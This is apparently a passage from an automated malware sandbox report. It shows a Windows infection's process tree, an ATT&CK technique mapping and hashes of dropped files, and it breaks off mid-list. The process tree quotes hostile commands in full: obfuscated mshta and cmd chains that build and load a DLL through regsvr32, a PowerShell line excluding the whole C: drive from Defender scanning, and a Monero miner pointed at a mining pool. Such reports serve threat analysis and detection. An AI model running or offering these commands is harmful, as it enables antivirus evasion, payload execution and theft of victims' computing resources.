                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\system32\cmd.exe" /Q /c TypE "C:\Users\Admin\AppData\Local\Temp\B135.exe" >..\72OtEAH3UaKAg8.exE && stArt ..\72oTEAH3UaKAG8.Exe /PrNjt~CkLtFO & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\B135.exe" ) do taskkill -F -Im "%~nXf"
                                                                                                                                              3⤵
                                                                                                                                                PID:2316
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\72OtEAH3UaKAg8.exE
                                                                                                                                                  ..\72oTEAH3UaKAG8.Exe /PrNjt~CkLtFO
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5468
                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                      "C:\Windows\System32\mshta.exe" Vbscript:CloSE ( CreateoBjeCt ( "wscRiPt.SHELl" ). RuN ( "C:\Windows\system32\cmd.exe /Q /c TypE ""C:\Users\Admin\AppData\Local\Temp\72OtEAH3UaKAg8.exE"" >..\72OtEAH3UaKAg8.exE && stArt ..\72oTEAH3UaKAG8.Exe /PrNjt~CkLtFO & If ""/PrNjt~CkLtFO "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\72OtEAH3UaKAg8.exE"" ) do taskkill -F -Im ""%~nXf"" " , 0 , trUe ) )
                                                                                                                                                      5⤵
                                                                                                                                                        PID:3400
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /Q /c TypE "C:\Users\Admin\AppData\Local\Temp\72OtEAH3UaKAg8.exE" >..\72OtEAH3UaKAg8.exE && stArt ..\72oTEAH3UaKAG8.Exe /PrNjt~CkLtFO & If "/PrNjt~CkLtFO " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\72OtEAH3UaKAg8.exE" ) do taskkill -F -Im "%~nXf"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:4716
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbSCRIPT: clOsE ( createoBjeCt ( "wscript.ShELL"). RUN ( "CMd.ExE /C eCHo %raNdOM%qzg6e> 0JEWOS.KO & ecHo | seT /P = ""MZ"" > V_GtEU_D.dN & CoPY /y /b V_Gteu_D.dN + VJJ4.W + EEjfm9r.TS+q~9PHU.X+ e2O~.Nkt + AVTS2y5r.H + IRuHyojI.Gf + 0JEWOs.Ko ..\W2~3.4 & Start regsvr32 ..\w2~3.4 /s & dEL /q *" , 0, True ) )
                                                                                                                                                          5⤵
                                                                                                                                                            PID:4232
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C eCHo %raNdOM%qzg6e> 0JEWOS.KO & ecHo | seT /P = "MZ" > V_GtEU_D.dN & CoPY /y /b V_Gteu_D.dN + VJJ4.W + EEjfm9r.TS+q~9PHU.X+ e2O~.Nkt + AVTS2y5r.H + IRuHyojI.Gf + 0JEWOs.Ko ..\W2~3.4 & Start regsvr32 ..\w2~3.4 /s & dEL /q *
                                                                                                                                                              6⤵
                                                                                                                                                                PID:4228
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>V_GtEU_D.dN"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:5316
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" ecHo "
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:4676
                                                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      regsvr32 ..\w2~3.4 /s
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      PID:5024
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill -F -Im "B135.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:184
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\499.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\499.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          PID:2812
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1912
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5216
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2376
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5792
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5428
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4672
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5364
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3108
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4472
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4852
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2100
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2912
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:852
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5468
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:6096
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:1472
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5536
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:596
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4148
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5252
                                                                                                                                                                                                  • C:\Windows\System32\WScript.exe
                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Nwkvkuevo.vbs"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4188
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\firefox.exe'
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1512
                                                                                                                                                                                                      • C:\Windows\System32\WScript.exe
                                                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Nwkvkuevo.vbs"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1840
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Awiseapohbkjmsedge.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Awiseapohbkjmsedge.exe"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1304
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\499.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\499.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:204
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 1
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:6124
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 1
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:6064
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 1
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:2780
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 1
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:3084
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        "powershell" -enc VQBuAHIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACcANAA5ADkAJwAgAC0AQwBvAG4AZgBpAHIAbQA6ACQAZgBhAGwAcwBlAA==
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5596
                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14444 -u 86FZq21Vy8RS2RPu48xKgeYKUCTG6by8PHbqTFvowo8gSDT8UVEivJChRza3fPKac5eXp2Ad8cKg6KLuYzmCSBUyQUUchsE.RIG1 -p x --algo rx/0
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:4172

                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                      2
                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                      2
                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1158

                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                      5
                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                      2
                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                      File Permissions Modification

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1222

                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1158

                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                      4
                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                      6
                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                      6
                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                      4
                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\libcurl.dll
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\libcurlpp.dll
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\libstdc++-6.dll
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\libwinpthread-1.dll
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\setup_install.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\setup_install.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_1.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_1.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_1.txt
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_2.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_2.txt
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_3.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_3.txt
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_4.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_4.txt
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_5.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_5.txt
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC78AC854\sonia_6.exe
                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                        SHA256

